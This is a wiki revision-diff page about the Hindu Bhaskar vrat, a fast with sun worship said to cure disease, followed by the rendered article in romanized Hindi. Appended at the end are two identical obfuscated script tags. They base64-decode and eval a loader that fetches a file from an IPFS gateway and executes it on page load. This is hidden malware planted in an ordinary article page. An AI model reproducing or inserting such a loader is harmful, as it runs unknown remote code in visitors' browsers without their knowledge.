Difference between revisions of "भास्कर व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[षष्ठी]] [[कृष्ण पक्ष|कृष्ण]] प्रतिपदा पर उपवास करना चाहिए।  
 
*[[षष्ठी]] [[कृष्ण पक्ष|कृष्ण]] प्रतिपदा पर उपवास करना चाहिए।  
 
*[[सप्तमी]] पर 'सूर्य प्रसन्न हों' शब्दों के साथ में श्राद्ध करना चाहिए।  
 
*[[सप्तमी]] पर 'सूर्य प्रसन्न हों' शब्दों के साथ में श्राद्ध करना चाहिए।  
*तिथिव्रत; [[देवता]] [[सूर्य देवता|सूर्य]] का पूजन करने से कर्ता रोगों से मुक्त हो जाता है।<ref>कालविवेक (416)</ref>, <ref>वर्षक्रियाकौमुदी (35, भविष्यपुराण से उद्धरण)</ref> ; <ref>तिथितत्व (145, ब्रह्मपुराण से उद्धरण)</ref>
+
*तिथिव्रत; [[देवता]] [[सूर्य देवता|सूर्य]] का पूजन करने से कर्ता रोगों से मुक्त हो जाता है।<ref>कालविवेक (416</ref>, <ref>वर्षक्रियाकौमुदी (35, भविष्यपुराण से उद्धरण</ref> ; <ref>तिथितत्त्व (145, ब्रह्मपुराण से उद्धरण</ref>
  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:44, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shashthi krishna pratipada par upavas karana chahie.
  • saptami par 'soory prasann hoan' shabdoan ke sath mean shraddh karana chahie.
  • tithivrat; devata soory ka poojan karane se karta rogoan se mukt ho jata hai.[1], [2] ; [3]


tika tippani aur sandarbh

  1. kalavivek (416
  2. varshakriyakaumudi (35, bhavishyapuran se uddharan
  3. tithitattv (145, brahmapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>